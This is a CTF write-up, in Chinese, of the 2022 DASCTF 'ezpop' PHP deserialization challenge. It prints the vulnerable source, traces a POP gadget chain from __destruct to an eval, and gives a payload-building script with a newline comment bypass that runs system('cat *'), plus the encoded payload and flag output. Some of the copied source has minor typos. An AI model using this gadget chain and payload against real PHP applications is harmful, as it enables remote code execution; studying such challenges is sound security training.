2022-DASCTF-ezpop分析

一道简单的php反序列化题目

源码分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
<?php  

class crow
{
    public $v1;
    public $v2;

    function eval({
        echo new $this->v1($this->v2);
    }

    public function __invoke()
    {
    $this->v1->world();
    }
}

class fin
{
    public $f1;

    public function __destruct()
    {
        echo $this->f1 . '114514';
    }

    public function run()
    {
        ($this->f1)();
    }

    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }

}

class what
{
    public $a;

    public function __toString()
    {
    $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;

    public function run()
    {
        ($this->m1)();
    }

    public function get_flag()
    {
        eval('#' . $this->m1);
    }

}

if (isset($_POST['cmd'])) { unserialize($_POST['cmd']);
else { highlight_file(__FILE__);
}

发现没有__wakeup()__construct(),那么最先被调用的应该就是fin类里面的__destruct()方法了。

构造POP

1
2
3
4
5
6
7
8
9
10
11
fin::__destruct()    # 其中的echo触发__toString()

what::__toString() # 调用run()

mix::run() # 将f1以函数方式调用,触发__invoke()

crow::__invoke() # 调用不存在的方法world(),触发__call()

fin::__call() # 调用get_flag()

mix::get_flag() # 这里在命令前加了一个注释符,用换行符绕过即可

构造Payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
<?php

class crow
{
public $v1;
public $v2;

public function __construct($v1)
{
$this->v1 = $v1;
}
}

class fin
{
public $f1;

public function __construct($f1)
{
$this->f1 = $f1;
}
}

class what
{
public $a;

public function __construct($a)
{
$this->a = $a;
}
}

class mix
{
public $m1;

public function __construct($m1)
{
$this->m1 = $m1;
}
}

$f=new mix("\nsystem('cat *');");
$e=new fin($f);
$d=new crow($e);
$c=new mix($d);
$b=new what($c);
$a=new fin($b);

echo urlencode(serialize($a));

输出

1
O%3A3%3A%22fin%22%3A1%3A%7Bs%3A2%3A%22f1%22%3BO%3A4%3A%22what%22%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A3%3A%22mix%22%3A1%3A%7Bs%3A2%3A%22m1%22%3BO%3A4%3A%22crow%22%3A2%3A%7Bs%3A2%3A%22v1%22%3BO%3A3%3A%22fin%22%3A1%3A%7Bs%3A2%3A%22f1%22%3BO%3A3%3A%22mix%22%3A1%3A%7Bs%3A2%3A%22m1%22%3Bs%3A17%3A%22%0Asystem%28%27cat+%2A%27%29%3B%22%3B%7D%7Ds%3A2%3A%22v2%22%3BN%3B%7D%7D%7D%7D

拿到flag

1
2
//flag{43282d76-6cb5-4e5c-9286-48e8688c6853}
not here, but it's close, think more.not here, but it's close, think more.not here, but it's close, think more.not here, but you are almost getting the flag!